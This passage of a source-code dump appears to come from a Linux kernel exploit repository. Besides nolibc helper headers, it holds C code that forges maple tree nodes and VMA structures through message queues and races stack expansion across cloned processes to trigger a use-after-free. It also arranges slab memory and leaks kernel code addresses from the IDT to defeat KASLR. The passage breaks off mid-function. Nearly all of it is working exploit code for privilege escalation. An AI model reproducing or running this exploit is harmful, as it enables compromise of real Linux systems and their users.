\ 105 | ~(1U << (__fd & FX_SETBITMASK)); \ 106 | } while (0) 107 | 108 | #define FD_SET(fd, set) do { \ 109 | fd_set *__set = (set); \ 110 | int __fd = (fd); \ 111 | if (__fd >= 0) \ 112 | __set->fds[__fd / FD_SETIDXMASK] |= \ 113 | 1 << (__fd & FD_SETBITMASK); \ 114 | } while (0) 115 | 116 | #define FD_ISSET(fd, set) ({ \ 117 | fd_set *__set = (set); \ 118 | int __fd = (fd); \ 119 | int __r = 0; \ 120 | if (__fd >= 0) \ 121 | __r = !!(__set->fds[__fd / FD_SETIDXMASK] & \ 122 | 1U << (__fd & FD_SET_BITMASK)); \ 123 | __r; \ 124 | }) 125 | 126 | #define FD_ZERO(set) do { \ 127 | fd_set *__set = (set); \ 128 | int __idx; \ 129 | int __size = (FD_SETSIZE+FD_SETBITMASK) / FD_SETIDXMASK;\ 130 | for (__idx = 0; __idx < __size; __idx++) \ 131 | __set->fds[__idx] = 0; \ 132 | } while (0) 133 | 134 | /* for poll() */ 135 | #define POLLIN 0x0001 136 | #define POLLPRI 0x0002 137 | #define POLLOUT 0x0004 138 | #define POLLERR 0x0008 139 | #define POLLHUP 0x0010 140 | #define POLLNVAL 0x0020 141 | 142 | struct pollfd { 143 | int fd; 144 | short int events; 145 | short int revents; 146 | }; 147 | 148 | /* for getdents64() */ 149 | struct linux_dirent64 { 150 | uint64_t d_ino; 151 | int64_t d_off; 152 | unsigned short d_reclen; 153 | unsigned char d_type; 154 | char d_name[]; 155 | }; 156 | 157 | /* needed by wait4() */ 158 | struct rusage { 159 | struct timeval ru_utime; 160 | struct timeval ru_stime; 161 | long ru_maxrss; 162 | long ru_ixrss; 163 | long ru_idrss; 164 | long ru_isrss; 165 | long ru_minflt; 166 | long ru_majflt; 167 | long ru_nswap; 168 | long ru_inblock; 169 | long ru_oublock; 170 | long ru_msgsnd; 171 | long ru_msgrcv; 172 | long ru_nsignals; 173 | long ru_nvcsw; 174 | long ru_nivcsw; 175 | }; 176 | 177 | /* The format of the struct as returned by the libc to the application, which 178 | * significantly differs from the format returned by the stat() syscall flavours. 179 | */ 180 | struct stat { 181 | dev_t st_dev; /* ID of device containing file */ 182 | ino_t st_ino; /* inode number */ 183 | mode_t st_mode; /* protection */ 184 | nlink_t st_nlink; /* number of hard links */ 185 | uid_t st_uid; /* user ID of owner */ 186 | gid_t st_gid; /* group ID of owner */ 187 | dev_t st_rdev; /* device ID (if special file) */ 188 | off_t st_size; /* total size, in bytes */ 189 | blksize_t st_blksize; /* blocksize for file system I/O */ 190 | blkcnt_t st_blocks; /* number of 512B blocks allocated */ 191 | time_t st_atime; /* time of last access */ 192 | time_t st_mtime; /* time of last modification */ 193 | time_t st_ctime; /* time of last status change */ 194 | }; 195 | 196 | /* WARNING, it only deals with the 4096 first majors and 256 first minors */ 197 | #define makedev(major, minor) ((dev_t)((((major) & 0xfff) << 8) | ((minor) & 0xff))) 198 | #define major(dev) ((unsigned int)(((dev) >> 8) & 0xfff)) 199 | #define minor(dev) ((unsigned int)(((dev) & 0xff)) 200 | 201 | #ifndef offsetof 202 | #define offsetof(TYPE, FIELD) ((size_t) &((TYPE *)0)->FIELD) 203 | #endif 204 | 205 | #ifndef container_of 206 | #define container_of(PTR, TYPE, FIELD) ({ \ 207 | __typeof__(((TYPE *)0)->FIELD) *__FIELD_PTR = (PTR); \ 208 | (TYPE *)((char *) __FIELD_PTR - offsetof(TYPE, FIELD)); \ 209 | }) 210 | #endif 211 | 212 | /* make sure to include all global symbols */ 213 | #include "nolibc.h" 214 | 215 | #endif /* _NOLIBC_TYPES_H */ 216 | -------------------------------------------------------------------------------- /exp/nolibc/unistd.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * unistd function definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_UNISTD_H 8 | #define _NOLIBC_UNISTD_H 9 | 10 | #include "std.h" 11 | #include "arch.h" 12 | #include "types.h" 13 | #include "sys.h" 14 | 15 | 16 | static __attribute__((unused)) 17 | int msleep(unsigned int msecs) 18 | { 19 | struct timeval my_timeval = { msecs / 1000, (msecs % 1000) * 1000 }; 20 | 21 | if (sys_select(0, 0, 0, 0, &my_timeval) < 0) 22 | return (my_timeval.tv_sec * 1000) + 23 | (my_timeval.tv_usec / 1000) + 24 | !!(my_timeval.tv_usec % 1000); 25 | else 26 | return 0; 27 | } 28 | 29 | static __attribute__((unused)) 30 | unsigned int sleep(unsigned int seconds) 31 | { 32 | struct timeval my_timeval = { seconds, 0 }; 33 | 34 | if (sys_select(0, 0, 0, 0, &my_timeval) < 0) 35 | return my_timeval.tv_sec + !!my_timeval.tv_usec; 36 | else 37 | return 0; 38 | } 39 | 40 | static __attribute__((unused)) 41 | int usleep(unsigned int usecs) 42 | { 43 | struct timeval my_timeval = { usecs / 1000000, usecs % 1000000 }; 44 | 45 | return sys_select(0, 0, 0, 0, &my_timeval); 46 | } 47 | 48 | static __attribute__((unused)) 49 | int tcsetpgrp(int fd, pid_t pid) 50 | { 51 | return ioctl(fd, TIOCSPGRP, &pid); 52 | } 53 | 54 | /* make sure to include all global symbols */ 55 | #include "nolibc.h" 56 | 57 | #endif /* _NOLIBC_UNISTD_H */ 58 | -------------------------------------------------------------------------------- /exp/src/main.c: -------------------------------------------------------------------------------- 1 | #include "../nolibc/nolibc.h" 2 | #include "../consts/log.h" 3 | #include "../consts/paging.h" 4 | #include "../consts/prog_regions.h" 5 | #include "../consts/stack.h" 6 | #include "../sysutil/pin_cpu.h" 7 | #include "nodes_decl.h" 8 | 9 | static char node_master_stack[COMMON_STACK_SIZE] STACK_ALIGNED; 10 | 11 | static long __get_stack_ptr(void) 12 | { 13 | register long rsp asm("rsp"); 14 | return rsp; 15 | } 16 | 17 | static int is_stack_switched(void) 18 | { 19 | long stack_ptr; 20 | 21 | stack_ptr = __get_stack_ptr(); 22 | if (stack_ptr <= (long)(node_master_stack + COMMON_STACK_SIZE) && 23 | stack_ptr > (long)node_master_stack) 24 | return 1; 25 | 26 | return 0; 27 | } 28 | 29 | static void switch_stack(void) 30 | { 31 | asm volatile("movq %0, %%rsp\n\t" 32 | "call main\n\t" 33 | "movq %%rax, %%rdi\n\t" 34 | "movq $60, %%rax\n\t" /* __NR_exit */ 35 | "syscall\n\t" 36 | "hlt\n\t" 37 | : 38 | : "r"(node_master_stack + COMMON_STACK_SIZE)); 39 | __builtin_unreachable(); 40 | } 41 | 42 | static void unmap_garbage(void) 43 | { 44 | int retval; 45 | 46 | retval = munmap((void *)(TASK_SIZE >> 1), (TASK_SIZE >> 1) - PAGE_SIZE); 47 | if (retval < 0) { 48 | perror(L_ERROR "[-] Cannot clean up unnecessary high maps"); 49 | exit(-1); 50 | } 51 | } 52 | 53 | #define LONG_NAME_FILE_DEPTH 65536 54 | 55 | static const char *RANDOM_FILE_NAME = 56 | "\nfawz\n\ny\n\n\ng\n\n\n\n\n\no\n\nj\nt\nsuro\nfk\njp\nq\n\n\n\n\n" 57 | "lv\n\n\nquhv\nv\nzv\nc\nv\n\n\n\n\n\n\n\nqiq\n\n\nu\nd\n\n\nr\nj\n" 58 | "\n\n\n\n\nerdb\n\n\n\n\n\n\n\n\ny\nv\n\n\n\n\n\n\nn\n\n\n\nf\nt\ny" 59 | "\nz\nae\n\n\n\n\n\n\n\nv\n\na\n\nyo\n\n\n\n\nk\n\no\n\n\nh\nj\n\n" 60 | "\n\nia\n\n\njp\n\n\n\nk\nf\ng\n\n\n\n\n\n\nom\nti\n\n\n\nf\n\nu\n" 61 | "\ng\n\no\ny\np\n\n\nc\nq\n\n\n\ncf\n\np\nt\n\n\n\n\n\n\ni\ng\n\nrd" 62 | "u\nscq\n\netbq\n\n\n\n\n"; 63 | 64 | static int __create_long_name_file(void) 65 | { 66 | int retval; 67 | int depth; 68 | int fd; 69 | 70 | retval = chdir("/tmp"); 71 | if (retval < 0) { 72 | perror(L_ERROR 73 | "[-] Cannot switch the current working directory to /tmp"); 74 | exit(-1); 75 | } 76 | 77 | for (depth = 0; depth < LONG_NAME_FILE_DEPTH; ++depth) { 78 | retval = mkdir(RANDOM_FILE_NAME, 0755); 79 | if (retval < 0) { 80 | perror(L_ERROR 81 | "[-] Cannot create a new directory with the crafted directory name"); 82 | exit(-1); 83 | } 84 | 85 | retval = chdir(RANDOM_FILE_NAME); 86 | if (retval < 0) { 87 | perror(L_ERROR 88 | "[-] Cannot swith the current working directory to the new directory"); 89 | exit(-1); 90 | } 91 | 92 | if (0 == (depth & 4095)) { 93 | fprintf(stderr, 94 | L_DOING 95 | "[ ] Creating a very deep file: %d/%d\n", 96 | depth, LONG_NAME_FILE_DEPTH); 97 | } 98 | } 99 | 100 | fd = open(RANDOM_FILE_NAME, O_RDWR | O_CREAT | O_TRUNC, 0644); 101 | if (fd < 0) { 102 | perror(L_ERROR "[-] Cannot create the deep file"); 103 | exit(-1); 104 | } 105 | 106 | fprintf(stderr, L_DONE "[+] Created the deep file\n"); 107 | 108 | return fd; 109 | } 110 | 111 | static void __fill_long_name_file(int fd) 112 | { 113 | char *buf = __data_start; 114 | long len = __data_end - __data_start; 115 | long retval; 116 | 117 | while (len > 0) { 118 | retval = write(fd, buf, len); 119 | if (retval < 0) { 120 | perror(L_ERROR 121 | "[-] Cannot write the data section to the deep file"); 122 | close(fd); 123 | exit(-1); 124 | } 125 | 126 | len -= retval; 127 | } 128 | } 129 | 130 | static void __map_long_name_file(int fd) 131 | { 132 | void *addr; 133 | 134 | addr = mmap(__data_start, PAGE_ALIGN(__data_end - __data_start), 135 | PROT_READ | PROT_WRITE, MAP_FILE | MAP_SHARED | MAP_FIXED, 136 | fd, 0); 137 | if (addr == MAP_FAILED) { 138 | perror(L_ERROR 139 | "[-] Cannot remap the data section from the deep file"); 140 | exit(-1); 141 | } 142 | } 143 | 144 | static void map_long_name_file(void) 145 | { 146 | int fd; 147 | 148 | fd = __create_long_name_file(); 149 | 150 | __fill_long_name_file(fd); 151 | 152 | __map_long_name_file(fd); 153 | 154 | close(fd); 155 | } 156 | 157 | static void init_cpu_pinning(void) 158 | { 159 | if (pin_cpu(CPU_0) < 0) { 160 | perror(L_ERROR "[-] Cannot pin to the first CPU"); 161 | exit(-1); 162 | } 163 | } 164 | 165 | int main(void) 166 | { 167 | if (!is_stack_switched()) { 168 | map_long_name_file(); 169 | switch_stack(); 170 | } 171 | 172 | unmap_garbage(); 173 | 174 | init_cpu_pinning(); 175 | return run_node_master(); 176 | } 177 | 178 | #include "node_master.c" 179 | #include "node_free.c" 180 | #include "node_use.c" 181 | -------------------------------------------------------------------------------- /exp/src/node_free.c: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../nolibc/nolibc.h" 3 | #include "../consts/log.h" 4 | #include "../consts/msg.h" 5 | #include "../consts/stack.h" 6 | #include "../sys/msg.h" 7 | #include "../sysutil/clone.h" 8 | #include "../sysutil/pin_cpu.h" 9 | #include "../sysutil/mbarrier.h" 10 | #include "nodes_decl.h" 11 | #include "nodes_master_free_use.h" 12 | #include "nodes_master_and_free.h" 13 | #include "nodes_free_and_use.h" 14 | #include 15 | 16 | #define MAPLE_MSQNUM 256 17 | #define MAPLE_MSQKEY 8888 18 | #define MAPLE_MSQTYP 1 19 | 20 | static int maple_msqids[MAPLE_MSQNUM]; 21 | 22 | static void __cleanup_maple_msq(int i) 23 | { 24 | int retval; 25 | 26 | retval = msgctl(maple_msqids[i], IPC_RMID, NULL); 27 | if (retval < 0) 28 | perror(L_ERROR "[-] Cannot destory maple-node message queues"); 29 | } 30 | 31 | static void __cleanup_maple_msqs(void) 32 | { 33 | int i; 34 | 35 | for (i = 0; i < MAPLE_MSQNUM; ++i) 36 | __cleanup_maple_msq(i); 37 | } 38 | 39 | static void cleanup_fildes(void) 40 | { 41 | close(fd_proc_maps); 42 | 43 | __cleanup_maple_msqs(); 44 | } 45 | 46 | static int __open_proc_maps(void) 47 | { 48 | int fd; 49 | 50 | fd = open("/proc/self/maps", O_RDONLY); 51 | if (fd < 0) { 52 | perror(L_ERROR "[-] Cannot open \"/proc/self/maps\""); 53 | return fd; 54 | } 55 | 56 | fd_proc_maps = fd; 57 | 58 | return 0; 59 | } 60 | 61 | static int __open_maple_msq(int i) 62 | { 63 | int retval; 64 | 65 | retval = msgget(MAPLE_MSQKEY + i, IPC_CREAT | 0600); 66 | if (retval < 0) { 67 | perror(L_ERROR 68 | "Cannot create message queues to forge maple nodes"); 69 | return retval; 70 | } 71 | 72 | maple_msqids[i] = retval; 73 | 74 | return 0; 75 | } 76 | 77 | static int __open_maple_msqs(void) 78 | { 79 | int i, retval; 80 | 81 | for (i = 0; i < MAPLE_MSQNUM; ++i) { 82 | retval = __open_maple_msq(i); 83 | if (retval < 0) 84 | goto err; 85 | } 86 | 87 | return 0; 88 | err: 89 | for (--i; i >= 0; --i) 90 | __cleanup_maple_msq(i); 91 | return retval; 92 | } 93 | 94 | static int open_necessary_files(void) 95 | { 96 | int retval; 97 | 98 | retval = __open_proc_maps(); 99 | if (retval < 0) 100 | return retval; 101 | 102 | retval = __open_maple_msqs(); 103 | if (retval < 0) { 104 | close(fd_proc_maps); 105 | return retval; 106 | } 107 | 108 | return 0; 109 | } 110 | 111 | static char node_use_stack[COMMON_STACK_SIZE] STACK_ALIGNED; 112 | 113 | static pid_t spawn_node_use(void) 114 | { 115 | pid_t pid; 116 | 117 | pid = clone_same_vm(&run_node_use, node_use_stack, COMMON_STACK_SIZE); 118 | if (pid < 0) { 119 | perror(L_ERROR "[-] Cannot create the \"use\" node"); 120 | return pid; 121 | } 122 | 123 | if (pin_cpu2(pid, CPU_1) < 0) 124 | perror(L_ERROR 125 | "[-] Cannot move the \"free\" node to the second CPU"); 126 | 127 | if (waitpid(pid, NULL, __WCLONE | WSTOPPED) < 0) 128 | perror(L_ERROR 129 | "[-] Cannot wait for the \"use\" node to enter the STOPPED state"); 130 | 131 | return pid; 132 | } 133 | 134 | #define MAPLE_RANGE64_SLOTS 16 135 | 136 | #define MA_ROOT_PARENT 1 137 | 138 | struct maple_range_64 { 139 | unsigned long parent; 140 | unsigned long pivot[MAPLE_RANGE64_SLOTS - 1]; 141 | unsigned long slot[MAPLE_RANGE64_SLOTS - 1]; 142 | struct maple_metadata { 143 | unsigned char end; 144 | unsigned char gap; 145 | } meta; 146 | }; 147 | 148 | #define MAPLE_NODE_SIZE 256 149 | _Static_assert(sizeof(struct maple_range_64) == MAPLE_NODE_SIZE, 150 | "Incorrect MAPLE_NODE_SIZE"); 151 | 152 | #define VICTIM_SLOT 10 153 | 154 | static struct maple_range_64 maple_node; 155 | 156 | static void init_maple_nodes(void) 157 | { 158 | maple_node.parent = MA_ROOT_PARENT; 159 | 160 | maple_node.slot[VICTIM_SLOT] = 0xdeadbeef; 161 | maple_node.pivot[VICTIM_SLOT] = ~0UL; 162 | 163 | maple_node.meta.end = VICTIM_SLOT; 164 | } 165 | 166 | static void prepare_maple_nodes(unsigned long addr) 167 | { 168 | maple_node.slot[VICTIM_SLOT] = addr; 169 | } 170 | 171 | static void __send_maple_node(int start, int end) 172 | { 173 | int retval, i; 174 | struct msg_hdr *hdr; 175 | 176 | hdr = (void *)&maple_node + KERNEL_MSGHDR_SIZE - USERSPACE_MSGHDR_SIZE; 177 | hdr->type = MAPLE_MSQTYP; 178 | 179 | for (i = start; i < end; ++i) { 180 | retval = msgsnd(maple_msqids[i], hdr, 181 | MAPLE_NODE_SIZE - KERNEL_MSGHDR_SIZE, 0); 182 | if (retval < 0) 183 | perror(L_ERROR 184 | "[-] Cannot send evil maple nodes to message queues"); 185 | } 186 | } 187 | 188 | #define PAD_MSQNUM 256 189 | #define UAF_MSQNUM 32 190 | 191 | static void send_pad_maple_nodes(void) 192 | { 193 | __send_maple_node(0, PAD_MSQNUM); 194 | } 195 | 196 | static void send_uaf_maple_nodes(void) 197 | { 198 | __send_maple_node(0, UAF_MSQNUM); 199 | } 200 | 201 | static volatile int uaf_ready_to_go; 202 | 203 | static void wait_uaf_ready(void) 204 | { 205 | while (!uaf_ready_to_go) 206 | asm volatile("pause" : : : "memory"); 207 | 208 | uaf_ready_to_go = 0; 209 | } 210 | 211 | static void __trigger_uaf(void) 212 | { 213 | *(volatile char *)stack_expansion_victim = 'x'; 214 | 215 | send_pad_maple_nodes(); 216 | 217 | synchronize_rcu(); 218 | 219 | send_uaf_maple_nodes(); 220 | } 221 | 222 | static void trigger_uaf(pid_t pid) 223 | { 224 | int retval; 225 | 226 | sched_yield(); 227 | 228 | retval = kill(pid, SIGCONT); 229 | if (retval < 0) { 230 | perror(L_ERROR "[-] Cannot resume the stopped \"use\" node"); 231 | return; 232 | } 233 | 234 | wait_uaf_ready(); 235 | msleep(free_timing_msec); 236 | 237 | __trigger_uaf(); 238 | } 239 | 240 | static int run_node_free(void) 241 | { 242 | pid_t pid; 243 | int retval; 244 | 245 | retval = open_necessary_files(); 246 | if (retval < 0) 247 | return retval; 248 | 249 | init_maple_nodes(); 250 | 251 | prepare_maple_nodes(exploit_address); 252 | 253 | pid = spawn_node_use(); 254 | if (pid < 0) { 255 | cleanup_fildes(); 256 | return pid; 257 | } 258 | 259 | trigger_uaf(pid); 260 | 261 | if (healthcheck_state == HEALTHCHECK_INIT) 262 | ++healthcheck_state; 263 | fputs(L_DOING "[ ] UAF state update: \"free\" has been completed\n", 264 | stderr); 265 | 266 | retval = waitpid(pid, NULL, __WCLONE); 267 | if (retval < 0) 268 | perror(L_ERROR 269 | "[-] Cannot wait for the \"free\" node to terminate"); 270 | 271 | cleanup_fildes(); 272 | 273 | return 0; 274 | } 275 | -------------------------------------------------------------------------------- /exp/src/node_master.c: -------------------------------------------------------------------------------- 1 | #include "../nolibc/nolibc.h" 2 | #include "../consts/log.h" 3 | #include "../consts/paging.h" 4 | #include "../consts/stack.h" 5 | #include "../consts/msg.h" 6 | #include "../sys/msg.h" 7 | #include "../sysutil/clone.h" 8 | #include "../sysutil/mbarrier.h" 9 | #include "nodes_decl.h" 10 | #include "nodes_master_free_use.h" 11 | #include "nodes_master_and_free.h" 12 | #include "nodes_master_and_use.h" 13 | #include 14 | 15 | #define ADDR_VICTIM ((void *)0x80000UL) 16 | #define SIZE_VICTIM PAGE_SIZE 17 | 18 | #define ADDR_GAP (ADDR_VICTIM - 1 * PAGE_SIZE) 19 | #define SIZE_GAP PAGE_SIZE 20 | 21 | #define ADDR_GUARD (ADDR_VICTIM - 2 * PAGE_SIZE) 22 | #define SIZE_GUARD PAGE_SIZE 23 | 24 | static int setup_maps(void) 25 | { 26 | void *addr; 27 | 28 | addr = mmap(ADDR_VICTIM, SIZE_VICTIM, PROT_READ | PROT_WRITE, 29 | MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN | 30 | MAP_FIXED_NOREPLACE, 31 | -1, 0); 32 | if (addr == MAP_FAILED) { 33 | perror(L_ERROR 34 | "[-] Cannot map upper pages for stack expansion"); 35 | return -1; 36 | } 37 | 38 | addr = mmap(ADDR_GUARD, SIZE_GUARD, 39 | PROT_READ | PROT_WRITE | MAP_EXECUTABLE, 40 | MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN | 41 | MAP_FIXED_NOREPLACE, 42 | -1, 0); 43 | if (addr == MAP_FAILED) { 44 | perror(L_ERROR 45 | "[-] Cannot map lower pages for stack expansion"); 46 | return -1; 47 | } 48 | 49 | return 0; 50 | } 51 | 52 | static void reset_maps(void) 53 | { 54 | (void)munmap(ADDR_GAP, SIZE_GAP); 55 | } 56 | 57 | #define VMA_MSQNUM 2048 58 | #define VMA_MSQKEY 1234 59 | 60 | static int vma_msqids[VMA_MSQNUM]; 61 | 62 | static void __cleanup_vma_msq(int i) 63 | { 64 | int retval; 65 | 66 | retval = msgctl(vma_msqids[i], IPC_RMID, NULL); 67 | if (retval < 0) 68 | perror(L_ERROR "[-] Cannot destory VMA message queues"); 69 | } 70 | 71 | static void cleanup_vma_msq(void) 72 | { 73 | int i; 74 | 75 | for (i = 0; i < VMA_MSQNUM; ++i) 76 | __cleanup_vma_msq(i); 77 | } 78 | 79 | static int __setup_vma_msq(int i) 80 | { 81 | int retval; 82 | 83 | retval = msgget(VMA_MSQKEY + i, IPC_CREAT | 0600); 84 | if (retval < 0) { 85 | perror(L_ERROR 86 | "[-] Cannot create message queues to forge VMA structures"); 87 | return retval; 88 | } 89 | 90 | vma_msqids[i] = retval; 91 | 92 | return 0; 93 | } 94 | 95 | static int setup_vma_msq(void) 96 | { 97 | int i, retval; 98 | 99 | for (i = 0; i < VMA_MSQNUM; ++i) { 100 | retval = __setup_vma_msq(i); 101 | if (retval < 0) 102 | goto err; 103 | } 104 | 105 | return 0; 106 | err: 107 | for (--i; i >= 0; --i) 108 | __cleanup_vma_msq(i); 109 | return retval; 110 | } 111 | 112 | #define VMA_MSQTYP 1 113 | 114 | static char vma_page[PAGE_SIZE]; 115 | 116 | static int __forge_evil_vma(int i) 117 | { 118 | struct msg_hdr *hdr; 119 | int retval; 120 | 121 | hdr = (void *)&vma_page[KERNEL_MSGHDR_SIZE - USERSPACE_MSGHDR_SIZE]; 122 | hdr->type = VMA_MSQTYP; 123 | 124 | retval = msgsnd(vma_msqids[i], hdr, PAGE_SIZE - KERNEL_MSGHDR_SIZE, 0); 125 | if (retval < 0) { 126 | perror(L_ERROR 127 | "[-] Cannot send evil VMA structures to message queues"); 128 | return retval; 129 | } 130 | 131 | return 0; 132 | } 133 | 134 | static int forge_evil_vma(void) 135 | { 136 | int i, retval; 137 | 138 | for (i = 0; i < VMA_MSQNUM; ++i) { 139 | retval = __forge_evil_vma(i); 140 | if (retval < 0) 141 | return retval; 142 | } 143 | 144 | return 0; 145 | } 146 | 147 | #define NODE_NUM 256 148 | 149 | static pid_t nodes[NODE_NUM]; 150 | 151 | static void __kill_node(pid_t pid, int sig) 152 | { 153 | int retval; 154 | 155 | retval = kill(pid, sig); 156 | if (retval < 0) 157 | perror(L_ERROR "[-] Cannot kill nodes"); 158 | } 159 | 160 | static void kill_node(int i, int sig) 161 | { 162 | pid_t pid = nodes[i]; 163 | 164 | if (!pid) { 165 | fputs(L_ERROR 166 | "Internal error: Trying to kill an invalid node\n", 167 | stderr); 168 | return; 169 | } 170 | 171 | __kill_node(pid, sig); 172 | } 173 | 174 | static void __wait_node(pid_t pid) 175 | { 176 | int retval; 177 | 178 | retval = waitpid(pid, NULL, __WCLONE); 179 | if (retval < 0) 180 | perror(L_ERROR "[-] Cannot wait for nodes"); 181 | } 182 | 183 | static void __clear_node(int i) 184 | { 185 | nodes[i] = 0; 186 | } 187 | 188 | static void wait_node(int i) 189 | { 190 | pid_t pid = nodes[i]; 191 | 192 | if (!pid) { 193 | fputs(L_ERROR 194 | "Internal error: Trying to wait for an invalid node\n", 195 | stderr); 196 | return; 197 | } 198 | 199 | __wait_node(pid); 200 | __clear_node(i); 201 | } 202 | 203 | static void __teardown_node(pid_t pid) 204 | { 205 | __kill_node(pid, SIGKILL); 206 | __wait_node(pid); 207 | } 208 | 209 | static void __teardown_node_at(int i) 210 | { 211 | pid_t pid; 212 | 213 | pid = nodes[i]; 214 | if (pid != 0) { 215 | __teardown_node(pid); 216 | __clear_node(i); 217 | } 218 | } 219 | 220 | static void teardown_nodes(void) 221 | { 222 | int i; 223 | 224 | for (i = 0; i < NODE_NUM; ++i) 225 | __teardown_node_at(i); 226 | } 227 | 228 | static char node_free_stack[COMMON_STACK_SIZE] STACK_ALIGNED; 229 | 230 | static int vma_create_node(int i) 231 | { 232 | pid_t pid; 233 | 234 | pid = clone_new_vm(&run_node_free, node_free_stack, COMMON_STACK_SIZE); 235 | if (pid < 0) { 236 | perror(L_ERROR "[-] Cannot create the \"free\" node"); 237 | return pid; 238 | } 239 | 240 | nodes[i] = pid; 241 | 242 | return 0; 243 | } 244 | 245 | static int setup_nodes(void) 246 | { 247 | int i; 248 | int result; 249 | 250 | for (i = 0; i < NODE_NUM; ++i) { 251 | result = vma_create_node(i); 252 | if (result < 0) 253 | goto err; 254 | } 255 | 256 | return 0; 257 | err: 258 | for (--i; i >= 0; --i) 259 | __teardown_node_at(i); 260 | 261 | return result; 262 | } 263 | 264 | #define OBJS_PER_SLAB 16 265 | 266 | static void prepare_fengshui(void) 267 | { 268 | int mod; 269 | int i; 270 | 271 | mod = (NODE_NUM - 1) % OBJS_PER_SLAB; 272 | 273 | for (i = NODE_NUM - 1; i >= 0; --i) { 274 | if (i % OBJS_PER_SLAB == mod) 275 | continue; 276 | 277 | kill_node(i, SIGKILL); 278 | } 279 | 280 | for (i = NODE_NUM - 1; i >= 0; --i) { 281 | if (i % OBJS_PER_SLAB == mod) 282 | continue; 283 | 284 | wait_node(i); 285 | } 286 | } 287 | 288 | #define LUCKY_TASK_ID 223 289 | 290 | static int check_nodes(void) 291 | { 292 | int i; 293 | 294 | for (i = 1; i < NODE_NUM; ++i) { 295 | if (nodes[i] == nodes[i - 1] + 1) 296 | continue; 297 | fprintf(stderr, 298 | L_ERROR 299 | "[-] Spaced PIDs (caused by background services?): " 300 | "[%d] = %d, [%d] = %d\n", 301 | i - 1, nodes[i - 1], i, nodes[i]); 302 | return -1; 303 | } 304 | 305 | return 0; 306 | } 307 | 308 | static int verify_healthcheck_state(void) 309 | { 310 | if (healthcheck_state != HEALTHCHECK_DONE) { 311 | fputs(L_ERROR 312 | "[-] Healthcheck failed: \"Use\" happens before \"free\", " 313 | "please try to enlarge LONG_FILE_NAME_DEPTH\n", 314 | stderr); 315 | return -1; 316 | } 317 | 318 | fputs(L_DONE "[+] Healcheck passed: \"Use\" happens after \"free\"\n", 319 | stderr); 320 | return 0; 321 | } 322 | 323 | static int warn_healthcheck_state(void) 324 | { 325 | if (healthcheck_state == HEALTHCHECK_DONE) 326 | return 0; 327 | 328 | fputs(L_ERROR 329 | "[-] Healthcheck says \"use\" happens before \"free\", aborting\n", 330 | stderr); 331 | return -1; 332 | } 333 | 334 | static int __do_exp(void) 335 | { 336 | int retval; 337 | 338 | fprintf(stderr, L_DOING "[ ] Trying with free_timing_msec=%d\n", 339 | free_timing_msec); 340 | 341 | healthcheck_state = HEALTHCHECK_INIT; 342 | reset_maps(); 343 | 344 | sched_yield(); 345 | retry: 346 | retval = setup_nodes(); 347 | if (retval < 0) 348 | return retval; 349 | 350 | if (check_nodes() != 0) { 351 | teardown_nodes(); 352 | sched_yield(); 353 | goto retry; 354 | } 355 | 356 | prepare_fengshui(); 357 | 358 | retval = waitpid(nodes[LUCKY_TASK_ID], NULL, __WCLONE | WSTOPPED); 359 | if (retval < 0) 360 | perror(L_ERROR "[-] Cannot wait for the \"free\" node"); 361 | 362 | kill_node(LUCKY_TASK_ID, SIGCONT); 363 | wait_node(LUCKY_TASK_ID); 364 | 365 | teardown_nodes(); 366 | 367 | if (free_timing_msec == 0) 368 | return verify_healthcheck_state(); 369 | else 370 | return warn_healthcheck_state(); 371 | } 372 | 373 | #define FREE_TIMING_INIT 50 374 | #define FREE_TIMING_RATIO 5 375 | #define FREE_TIMING_STEP 5 376 | 377 | static int __do_first_exp(void) 378 | { 379 | int retval; 380 | int msec; 381 | 382 | free_timing_msec = 0; 383 | retval = __do_exp(); 384 | if (retval < 0) 385 | return retval; 386 | 387 | for (msec = FREE_TIMING_INIT;; msec += msec / FREE_TIMING_RATIO) { 388 | free_timing_msec = msec; 389 | retval = __do_exp(); 390 | if (retval < 0) 391 | return retval; 392 | if (exploit_results[0] != 0) 393 | return 0; 394 | } 395 | } 396 | 397 | static int __do_next_exp(void) 398 | { 399 | int retval; 400 | int msec, initial_timing; 401 | 402 | initial_timing = free_timing_msec; 403 | 404 | for (msec = 0;; msec += FREE_TIMING_STEP) { 405 | free_timing_msec = initial_timing + msec; 406 | retval = __do_exp(); 407 | if (retval < 0) 408 | return retval; 409 | if (exploit_results[0] != 0) 410 | return 0; 411 | 412 | if (msec == 0 || msec > initial_timing) 413 | continue; 414 | 415 | free_timing_msec = initial_timing - msec; 416 | retval = __do_exp(); 417 | if (retval < 0) 418 | return retval; 419 | if (exploit_results[0] != 0) 420 | return 0; 421 | } 422 | } 423 | 424 | static int do_exp(unsigned long target_address) 425 | { 426 | exploit_address = target_address; 427 | stack_expansion_victim = ADDR_VICTIM - 1; 428 | 429 | exploit_results[0] = 0; 430 | 431 | if (free_timing_msec == 0) 432 | return __do_first_exp(); 433 | else 434 | return __do_next_exp(); 435 | } 436 | 437 | #define IDT_BASE_ADDR 0xfffffe0000000000ul 438 | #define IDT_ENTRY_SIZE 16 439 | #define IDT_ENTRY_NUM 256 440 | 441 | #define IDT_LAST_ENTRY (IDT_BASE_ADDR + (IDT_ENTRY_NUM - 1) * IDT_ENTRY_SIZE) 442 | 443 | static unsigned long leaked_code_addr; 444 | 445 | static int __exp_leak_code(void) 446 | { 447 | unsigned long v0, v1, v; 448 | int retval; 449 | 450 | retval = do_exp(IDT_LAST_ENTRY); 451 | if (retval < 0) 452 | return retval; 453 | 454 | v0 = exploit_results[0]; 455 | v1 = exploit_results[1]; 456 | v = (v0 & 0xFFFF) | ((v0 >> 32) & (0xFFFF0000)) | (v1 << 32); 457 | 458 | fprintf(stderr, L_DONE "[+] Leaked code address: %lx\n", v); 459 | leaked_code_addr = v; 460 | 461 | return 0; 462 | } 463 | 464 | #define __OFF_asm_sysvec_spurious_apic_interrupt 0xffffffff81e00cd0 465 | #define __OFF_node_data 0xffffffff82814ea0 466 | 467 | static unsigned long leaked_heap_addr; 468 | 469 | static int __exp_leak_heap(void) 470 | { 471 | unsigned long v; 472 | int retval; 473 | 474 | v = leaked_code_addr - __OFF_asm_sysvec_spurious_apic_interrupt + 475 | 